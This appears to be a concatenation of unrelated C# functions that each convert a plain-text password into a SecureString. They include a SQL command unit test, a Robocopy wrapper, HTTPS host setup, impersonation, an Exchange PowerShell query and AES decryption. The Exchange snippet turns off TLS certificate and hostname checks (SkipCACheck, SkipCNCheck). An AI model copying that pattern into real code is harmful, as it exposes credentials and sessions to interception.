public void NewCommandValidInput() { // Build test variables for later var Con = new SqlConnection(ConStr); var Con2 = new SqlConnection(ConStr2); var Params = new SqlCommand().Parameters; var Params2 = new List <SqlParameter>(); for (int i = 0; i < 3; i++) { Params.AddWithValue('@' + i.ToString(), i); Params2.Add(new SqlParameter('@' + i.ToString(), i + 1)); } // Create fake credentials to test with var Cipher = new System.Security.SecureString(); foreach (char c in Pwd) { Cipher.AppendChar(c); } Cipher.MakeReadOnly(); var Cred = new SqlCredential(UsrNm, Cipher); // Test1 - CommandText var Cmd = SqlCmd.New(Command); Assert.AreEqual(Command, Cmd.CommandText); Assert.IsNull(Cmd.Connection); Cmd = null; // Test2 - CommandText, CommandType Cmd = SqlCmd.New(Command, CommandType.Text); Assert.AreEqual(Command, Cmd.CommandText); Assert.AreEqual(CommandType.Text, Cmd.CommandType); Assert.IsNull(Cmd.Connection); Cmd = null; // Test3 - CommandText, Timeout Cmd = SqlCmd.New(Command, 3); Assert.AreEqual(Command, Cmd.CommandText); Assert.AreEqual(3, Cmd.CommandTimeout); Assert.IsNull(Cmd.Connection); Cmd = null; // Test4 - CommandText, SqlConnection Cmd = SqlCmd.New(Command, Con); Assert.AreEqual(Command, Cmd.CommandText); Assert.IsNotNull(Cmd.Connection); Assert.AreEqual(Con, Cmd.Connection); Cmd = null; // Test5 - CommandText, SqlParameterCollection Cmd = SqlCmd.New(Command3, Params); Assert.AreEqual(Command3, Cmd.CommandText); Assert.IsNotNull(Cmd.Parameters); for (int i = 0, j = Cmd.Parameters.Count; i < j; i++) { Assert.AreEqual(Params[i].ParameterName, Cmd.Parameters[i].ParameterName); Assert.AreEqual(Params[i].Value, Cmd.Parameters[i].Value); } Cmd = null; // Test6 - CommandText, ConnectionString Cmd = SqlCmd.New(Command, ConStr); Assert.AreEqual(Command, Cmd.CommandText); Assert.IsNotNull(Cmd.Connection); Assert.AreEqual(ConStr, Cmd.Connection.ConnectionString); Cmd = null; // Test7 - CommandText, List<SqlParameter> Cmd = SqlCmd.New(Command3, Params2); Assert.AreEqual(Command3, Cmd.CommandText); for (int i = 0, j = Cmd.Parameters.Count; i < j; i++) { Assert.AreEqual(Params2[i].ParameterName, Cmd.Parameters[i].ParameterName); Assert.AreEqual(Params2[i].Value, Cmd.Parameters[i].Value); } // Test17 - CommandText, ConnectionString, SqlCredential Cmd = SqlCmd.New(Command2, ConStr2, Cred); Assert.AreEqual(Command2, Cmd.CommandText); Assert.IsNotNull(Cmd.Connection); Assert.IsNotNull(Cmd.Connection.Credential); Assert.AreEqual(ConStr2, Cmd.Connection.ConnectionString); Assert.AreEqual(Cred, Cmd.Connection.Credential); Cmd = null; // Test20 - CommandText, CommandType, Timeout, SqlParameterCollection Cmd = SqlCmd.New(Command3, CommandType.StoredProcedure, 15, Params); Assert.AreEqual(Command3, Cmd.CommandText); Assert.AreEqual(CommandType.StoredProcedure, Cmd.CommandType); Assert.AreEqual(15, Cmd.CommandTimeout); for (int i = 0, j = Cmd.Parameters.Count; i < j; i++) { Assert.AreEqual(Params[i].ParameterName, Cmd.Parameters[i].ParameterName); Assert.AreEqual(Params[i].Value, Cmd.Parameters[i].Value); } Cmd = null; // Test32 - CommandText, ConnectionString, Username, Password Cmd = SqlCmd.New(Command, ConStr2, UsrNm, Pwd); Assert.AreEqual(Command, Cmd.CommandText); Assert.IsNotNull(Cmd.Connection); Assert.IsNotNull(Cmd.Connection.Credential); Assert.AreEqual(ConStr2, Cmd.Connection.ConnectionString); Assert.AreEqual(UsrNm, Cmd.Connection.Credential.UserId); Assert.AreEqual(8, Cmd.Connection.Credential.Password.Length); Cmd = null; // Test50 - CommandText, ConnectionString, SqlCredentail, CommandType, Timeout, List<SqlParameter> Cmd = SqlCmd.New(Command, ConStr2, Cred, CommandType.Text, 30, Params2); Assert.AreEqual(Command, Cmd.CommandText); Assert.AreEqual(CommandType.Text, Cmd.CommandType); Assert.IsNotNull(Cmd.Connection); Assert.IsNotNull(Cmd.Connection.Credential); Assert.AreEqual(ConStr2, Cmd.Connection.ConnectionString); Assert.AreEqual(Cred, Cmd.Connection.Credential); Assert.AreEqual(30, Cmd.CommandTimeout); for (int i = 0, j = Cmd.Parameters.Count; i < j; i++) { Assert.AreEqual(Params2[i].ParameterName, Cmd.Parameters[i].ParameterName); Assert.AreEqual(Params2[i].Value, Cmd.Parameters[i].Value); } Cmd = null; // Test57 - CommandText, ConnectionString, Username, Password, CommandType, Timeout, List<SqlParameter> Cmd = SqlCmd.New(Command, ConStr2, UsrNm, Pwd, CommandType.Text, 120, Params2); Assert.AreEqual(Command, Cmd.CommandText); Assert.AreEqual(CommandType.Text, Cmd.CommandType); Assert.IsNotNull(Cmd.Connection); Assert.IsNotNull(Cmd.Connection.Credential); Assert.AreEqual(ConStr2, Cmd.Connection.ConnectionString); Assert.AreEqual(UsrNm, Cmd.Connection.Credential.UserId); Assert.AreEqual(8, Cmd.Connection.Credential.Password.Length); Assert.AreEqual(120, Cmd.CommandTimeout); for (int i = 0, j = Cmd.Parameters.Count; i < j; i++) { Assert.AreEqual(Params2[i].ParameterName, Cmd.Parameters[i].ParameterName); Assert.AreEqual(Params2[i].Value, Cmd.Parameters[i].Value); } Cmd = null; }
public Task Start(string domain = "", string username = "", string password = "") { Debugger.Instance.DebugMessage("RoboCommand started execution."); hasError = false; // make sure source path is valid if (!Directory.Exists(CopyOptions.Source.Replace("\"", ""))) { Debugger.Instance.DebugMessage("The Source directory does not exist."); hasError = true; OnCommandError?.Invoke(this, new ErrorEventArgs("The Source directory does not exist.")); Debugger.Instance.DebugMessage("RoboCommand execution stopped due to error."); return null; } #region Create Destination Directory try { var dInfo = Directory.CreateDirectory(CopyOptions.Destination.Replace("\"", "")); if (!dInfo.Exists) { Debugger.Instance.DebugMessage("The destination directory does not exist."); hasError = true; OnCommandError?.Invoke(this, new ErrorEventArgs("The Destination directory is invalid.")); Debugger.Instance.DebugMessage("RoboCommand execution stopped due to error."); return null; } } catch (Exception ex) { Debugger.Instance.DebugMessage(ex.Message); hasError = true; OnCommandError?.Invoke(this, new ErrorEventArgs("The Destination directory is invalid.")); Debugger.Instance.DebugMessage("RoboCommand execution stopped due to error."); return null; } #endregion backupTask = Task.Factory.StartNew(() => { process = new Process(); if (!string.IsNullOrEmpty(domain)) { Debugger.Instance.DebugMessage(string.Format("RoboCommand running under domain - {0}", domain)); process.StartInfo.Domain = domain; } if (!string.IsNullOrEmpty(username)) { Debugger.Instance.DebugMessage(string.Format("RoboCommand running under username - {0}", username)); process.StartInfo.UserName = username; } if (!string.IsNullOrEmpty(password)) { Debugger.Instance.DebugMessage("RoboCommand password entered."); var ssPwd = new System.Security.SecureString(); for (int x = 0; x < password.Length; x++) { ssPwd.AppendChar(password[x]); } process.StartInfo.Password = ssPwd; } Debugger.Instance.DebugMessage("Setting RoboCopy process up..."); process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.RedirectStandardError = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.StartInfo.CreateNoWindow = true; process.StartInfo.FileName = "ROBOCOPY.exe"; process.StartInfo.Arguments = GenerateParameters(); process.OutputDataReceived += process_OutputDataReceived; process.ErrorDataReceived += process_ErrorDataReceived; Debugger.Instance.DebugMessage("RoboCopy process started."); process.Start(); process.BeginOutputReadLine(); process.BeginErrorReadLine(); process.WaitForExit(); Debugger.Instance.DebugMessage("RoboCopy process exited."); }); backupTask.ContinueWith((continuation) => { if (!hasError) { // backup is complete if (OnCommandCompleted != null) { OnCommandCompleted(this, new RoboCommandCompletedEventArgs()); } } Stop(); }); return backupTask; }
static IWebHostBuilder CreateWebHostBuilder(string[] args) { //TODO this should be dynamically loaded from Secrets var dict = new Dictionary <string, string> { { "data_storage_service_type", "internal.mongodb" }, { "connection_string", "mongodb://localhost:27017" } }; var config = new ConfigurationBuilder() .AddInMemoryCollection(dict) .Build(); // Show the configuration path Console.WriteLine("Configuration file path: " + Utils.GetConfigPath()); // Get the configured environment variable string environment = Environment.GetEnvironmentVariable("ASPNETCORE_ENVIRONMENT"); // Check for configured HTTPS ports string httpsOverridePort = Environment.GetEnvironmentVariable("OVERRIDE_HTTPS_PORT"); if (string.IsNullOrEmpty(httpsOverridePort)) { httpsOverridePort = "443"; } else { Console.WriteLine("HTTPS Override environment variable found: " + httpsOverridePort); } int httpsPort = int.Parse(httpsOverridePort); // Configure ssl file name and password string sslFileName = "castlepoint.pfx"; string sslPasswordName = "castlepoint.pfx.pwd"; if (environment == "Development") { Console.WriteLine("Development environment detected - setting developer SSL certificate"); sslFileName = "castlepoint-localhost.pfx"; sslPasswordName = "castlepoint-localhost.pfx.pwd"; } // load web certificate Console.WriteLine("Loading SSL certificate files..."); byte[] signingCert = Utils.GetSecretOrEnvVarAsByte(sslFileName); if (signingCert == null || signingCert.Length == 0) { throw new ApplicationException("Invalid SSL certificate. Check the configuration of: " + sslFileName); } Console.WriteLine("Cert file loaded length=" + signingCert.Length.ToString()); string certPassword = Utils.GetSecretOrEnvVar(sslPasswordName); if (string.IsNullOrEmpty(certPassword)) { throw new ApplicationException("Invalid SSL password. Check the configuration of: " + sslPasswordName); } else { certPassword = certPassword.Trim(); } Console.WriteLine("Cert pwd loaded, converting to SecureString..."); System.Security.SecureString secpwd = new System.Security.SecureString(); foreach (char c in certPassword.ToCharArray()) { secpwd.AppendChar(c); } System.Security.Cryptography.X509Certificates.X509Certificate2 cert; try { Console.WriteLine("Loading SSL certificate with key..."); cert = new System.Security.Cryptography.X509Certificates.X509Certificate2(signingCert, secpwd, System.Security.Cryptography.X509Certificates.X509KeyStorageFlags.MachineKeySet); Console.WriteLine("SSL certificate loaded"); Console.WriteLine("Configuring web host..."); return(WebHost.CreateDefaultBuilder(args) .UseConfiguration(config) .ConfigureLogging((context, builder) => { builder.AddConsole(); builder.AddDebug(); }) .UseStartup <Startup>() .UseKestrel(options => { // Switch based on environment Console.WriteLine("==> Environment detected:" + environment); switch (environment) { case "Production": //options.ListenUnixSocket("/tmp/kestrel-castlepoint-api.sock"); //options.ListenUnixSocket("/tmp/kestrel-castlepoint-api.sock", listenOptions => //{ // listenOptions.UseHttps(cert); //}); Console.WriteLine("Starting Web listen service on port " + httpsOverridePort + "..."); options.Listen(System.Net.IPAddress.Any, httpsPort, listenOptions => { listenOptions.UseHttps(cert); }); break; case "Staging": //options.ListenUnixSocket("/tmp/kestrel-castlepoint-api.sock"); //options.ListenUnixSocket("/tmp/kestrel-castlepoint-api.sock", listenOptions => //{ // listenOptions.UseHttps(cert); //}); Console.WriteLine("Starting Web listen service on port " + httpsOverridePort + "..."); options.Listen(System.Net.IPAddress.Any, httpsPort, listenOptions => { listenOptions.UseHttps(cert); }); break; case "Development": Console.WriteLine("Starting Web listen service on port 5001..."); options.Listen(System.Net.IPAddress.Any, 5001, listenOptions => { listenOptions.UseHttps(cert); }); break; } })); } catch (Exception ex) { string exceptionMsg = ex.Message; Console.WriteLine("Error loading SSL certificate: " + exceptionMsg); throw; } // Console.WriteLine("Loading SSL certificate..."); //var cert = new System.Security.Cryptography.X509Certificates.X509Certificate2(signingCert, certPassword); //Console.WriteLine("SSL certificate loaded"); }
public static Exception Impersonate(string aUserName, string aDomainName, string aPass) { System.Security.SecureString s = new System.Security.SecureString(); foreach (char c in aPass) s.AppendChar(c); return Impersonate(aUserName, aDomainName, s); }
public ICustomActivityResult Execute() { string command = "get-mailbox"; DataTable dt = new DataTable("resultSet"); string shellUri = ""; System.Uri serverUri = new Uri(String.Format("HTTPS://{0}/powershell?serializationLevel=Full", HostName)); System.Security.SecureString securePassword = new System.Security.SecureString(); foreach (char c in Password.ToCharArray()) { securePassword.AppendChar(c); } PSCredential creds = new PSCredential(UserName, securePassword); RunspaceConfiguration rc = RunspaceConfiguration.Create(); WSManConnectionInfo wsManInfo = new WSManConnectionInfo(serverUri, shellUri, creds); wsManInfo.SkipCNCheck = true; wsManInfo.SkipCACheck = true; using (var runspace = RunspaceFactory.CreateRunspace(wsManInfo)) { runspace.Open(); using (PowerShell powershell = PowerShell.Create()) { powershell.Runspace = runspace; powershell.AddCommand(command); powershell.Commands.AddParameter("Identity", UserLogonName); powershell.Commands.AddParameter("ErrorAction", "stop"); Collection <PSObject> results = powershell.Invoke(); dt.Columns.Add(PropertyName, typeof(String)); StringBuilder stringBuilder = new StringBuilder(); foreach (PSObject obj in results) { PSPropertyInfo psInfo = obj.Properties[PropertyName]; if (psInfo != null) { if (psInfo.Value != null) { DataRow dr = dt.NewRow(); dr[PropertyName] = psInfo.Value.ToString(); dt.Rows.Add(dr); } } else { throw new Exception(string.Format("The property \"{0}\" does not exist.", PropertyName)); } } } } return(this.GenerateActivityResult(dt)); }
/// <summary> /// Decrypts the specified data using a 256-bit cipher. The key can be any length. /// </summary> /// <param name="Data">The data to be decrypted. Will be converted to UTF8.</param> /// <param name="Key">The key used to decrypt the data.</param> /// <returns>A string containing the decoded data.</returns> public static System.Security.SecureString Decrypt256StringSecure(Stream Data, byte[] Key) { RijndaelManaged AES = null; CryptoStream CS = null; StreamReader DS = null; try { //Get the IV and length corrected Key. KeyData KeyData = GenerateKeyIV128(Key); //Create the AES crytpograhy object. AES = new RijndaelManaged { BlockSize = 256, KeySize = 256, Key = KeyData.Key, IV = KeyData.IV, Mode = CipherMode.CBC, Padding = PaddingMode.PKCS7 }; CS = new CryptoStream(Data, AES.CreateDecryptor(), CryptoStreamMode.Read); DS = new StreamReader(CS); var ss = new System.Security.SecureString(); while (DS.EndOfStream == false) ss.AppendChar(Convert.ToChar(DS.Read())); ss.MakeReadOnly(); return ss; } finally { if (AES != null) AES.Clear(); if (CS != null) CS.Dispose(); if (DS != null) DS.Dispose(); } }
private void RunTaskAsProcess(TaskData taskData) { _hasErrorMessage = false; _hasOutputMessage = false; var process = new Process { StartInfo = new ProcessStartInfo { FileName = taskData.ActioningData.Command, Arguments = taskData.ActioningData.Parameters, UseShellExecute = false, RedirectStandardOutput = true, RedirectStandardError = true, WorkingDirectory = taskData.ActioningData.StartIn, CreateNoWindow = true } }; if (taskData.ActioningData.RunAsOther) { System.Security.SecureString ssPwd = new System.Security.SecureString(); process.StartInfo.Domain = taskData.ActioningData.Domain; process.StartInfo.UserName = taskData.ActioningData.UserName; string password = taskData.ActioningData.Password; for (int x = 0; x < password.Length; x++) { ssPwd.AppendChar(password[x]); } process.StartInfo.Password = ssPwd; } process.OutputDataReceived += Process_OutputDataReceived; process.ErrorDataReceived += Process_ErrorDataReceived; process.EnableRaisingEvents = true; process.Exited += Process_Exited; _taskData.DebugData.Output = string.Empty; _taskData.DebugData.TaskStatus = ETaskStatus.Running; _taskStatus = _taskData.DebugData.TaskStatus; string notificationMessageTemplate = "Starting task \"{0}\"... "; string notificationMessage = string.Format(notificationMessageTemplate, _taskData.Name); TaskNotification?.Invoke(this, new TaskNotificationEventArgs(notificationMessage, _taskData.Id, _taskData.Name, ENotificationType.TaskStart)); string managementMessage = ToManagementMessage(notificationMessage); _taskData.DebugData.Output += managementMessage; ManagementDataReceived?.Invoke(this, new TaskDataReceivedEventArgs(managementMessage, _taskData.Id)); StatusChanged?.Invoke(this, new TaskStatusChangedEventArgs(_taskStatus, _taskData.Id)); _taskData.DebugData.DateStarted = DateTime.Now; try { process.Start(); } catch (Exception ex) { notificationMessageTemplate = "Error while running \"{0}\": \r\b\t:{1}"; notificationMessage = string.Format(notificationMessageTemplate, _taskData.Name, ex.Message); TaskNotification?.Invoke(this, new TaskNotificationEventArgs(notificationMessage, _taskData.Id, _taskData.Name, ENotificationType.TaskCrash)); managementMessage = ToManagementMessage(notificationMessage); _taskData.DebugData.Output += managementMessage; ManagementDataReceived?.Invoke(this, new TaskDataReceivedEventArgs(managementMessage, _taskData.Id)); } process.BeginOutputReadLine(); process.BeginErrorReadLine(); _process = process; }